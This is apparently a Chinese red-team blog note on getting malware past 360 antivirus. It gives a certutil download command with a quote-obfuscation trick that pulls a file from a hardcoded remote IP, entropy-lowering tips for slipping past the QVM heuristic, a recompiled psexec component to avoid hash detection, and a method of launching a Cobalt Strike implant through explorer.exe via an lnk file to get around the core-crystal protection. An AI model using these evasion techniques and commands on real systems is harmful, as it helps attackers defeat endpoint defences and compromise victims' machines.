绕过360远程下载

urlcache中间为中文的双引号

1
certutil && certutil -url“”cache -split -f http://121.204.212.212:60212/a

7c1a2066a0494f313be5e3670ae0df4.png

bypassQVM上线

单360查杀力不高,装了杀毒后直接儿子变爸爸,查杀力大大提升,对于简单的加密识别度较高,容易上线后云查杀过一会掉线,推荐使用分离加载方式,并使用反沙箱的代码延长马子时间

最大的特性是 QVM,360会对可疑程序进行拦截,标签为HEUR/QVM202.0.29xx.Malware.Gen

image.png

应对方法:降低熵值

  • 添加图标、签名等可信资源
  • 编译方式优化(使用QT、MFC编译,go使用多种参数结合编译)
  • 加密函数算法使用uuid、rc4等调用库,避免使用AES等可疑算法
  • 添加无用垃圾代码

熵值计算 https://github.com/yutianqaq/EntropyCalc_Go

b46e4357858bf4537e623442c208084.png

bypass360 psexec

直接 psexec 报毒,由于impacket组件横向使用原版程序,hash特征已被标记

image-20240315165604298

原版程序特征在 remcomsvc.py

image.png

重新编译生成 https://github.com/kavika13/remcom
image-20240315165444502
重新编译生成,或者使用自定义加载器

image-20240315165503225

image-20240315165526169

除此以外,psexec过程中还存在一些其他特征

随机4位字符的服务名称

image.png

默认使用的命令管道

image.png

查看360核晶开启状态

1
2
3
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\360Hvm"
WorkConfig REG_DWORD 0x1 //开启
WorkConfig REG_DWORD 0x0 //关闭

虚拟机打开需勾选以下选项

核晶模式上线CS马

通过webshell上传终端后执行文件被拦截

image.png

测试网上公开的方法:

通过jar包加载shellcode进行加载,失效被拦截

image.png

通过哥斯拉内存注入rundll32.exe进行shellcode加载,失效被拦截

image.png

通过webshell终端运行被拦截,但双击运行能够正常上线

image.png

分析原因:双击执行文件,cs马是通过 explorer.exe 进程下调用的

image.png

通过webshell终端执行命令是通过 java.exe 进程下调用的

image.png

bypass手段: lnk—explorer—cs马上线

1
C:\Windows\explorer.exe "C:/Users/测试/84b24a.exe"   //lnk目标位置

image.png

这样我们的cs木马上线是通过 explorer.exe 进程下调起的,不会被拦截

image.png